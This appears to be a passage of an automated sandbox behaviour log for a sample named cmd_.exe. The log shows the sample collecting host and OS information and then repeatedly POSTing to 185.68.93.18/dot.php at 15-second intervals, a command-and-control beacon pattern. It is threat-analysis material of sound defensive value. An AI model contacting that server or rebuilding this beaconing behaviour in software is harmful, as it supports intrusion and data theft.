| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75530000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n39ju1 6cribq\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 260 |
|
1 | |
| System | Get Computer Name | type = ComputerNameDnsDomain |
|
1 | |
| DNS | Get Hostname | name_out = o5zInUQXjZk |
|
1 | |
| DNS | Resolve Name | host = o5zInUQXjZk, address_out = 192.168.0.181 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75530000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7556be77 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75530000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProductInfo, address_out = 0x75568aef |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 24, size_out = 24 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 12, size_out = 12 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 12, size_out = 12 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 12, size_out = 12 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 12, size_out = 12 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 12, size_out = 12 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 |
